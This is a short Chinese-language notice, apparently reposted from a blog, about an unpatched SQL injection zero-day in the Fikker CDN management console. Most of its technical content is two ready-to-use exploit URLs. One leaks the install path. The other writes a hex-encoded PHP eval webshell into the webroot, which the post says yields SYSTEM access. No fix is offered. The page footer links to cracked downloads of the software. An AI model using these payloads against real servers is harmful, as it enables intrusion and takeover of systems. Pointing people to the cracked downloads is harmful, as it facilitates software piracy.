重要提示!FIKKER主控0DAY漏洞!

重要提示!FIKKER主控0DAY漏洞!

请各位使用fikkerCDN软件的用户阅读以下内容。

Fikker 是一款面向 CDN/站长 的专业级网站缓存(Webcache)和反向代理服务器软件(Reversed Proxy Server)。近日在一起安全事件中發現fikker主控多個php文件存在高危注入漏洞,可獲取Webshell to System.

目前官方尚未修復該漏洞。

漏洞級別:嚴重

影響版本:所有

#爆目錄
admin_modify.php?id=-1%20union%20select%201,@@basedir,3,4,5,6,7,8,9,10,11,12,13
#寫一句話(目錄如果改了,可以通過下面的語句加些/這些讓PHP報錯)
admin_modify.php?id=1%20and%201=2%20union%20select%200x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e,9,10,11,12,13%20into%20outfile%20%27d:/FikkerCDN/webroot/fikcdn/admin/test.php%27

後記:

如果僅僅是注入,也是最多爆爆庫啥的,進進後台改改數據之類。但是由於開發人員缺乏安全意識,主控依賴的Apache,MySql等,都是以System權限在Windows 上運行,這意味著只要有注入就可以導出WebShell,只要有Webshell就有System.

 

原文来自金猪大佬:https://zhu.vn/archives/1981

本站相关内容

Fikker CDN -3.7.4到3.7.6-windows-x86-64_全功能破解版下载

Fikker CDN3.7.6-linux_全功能破解版下载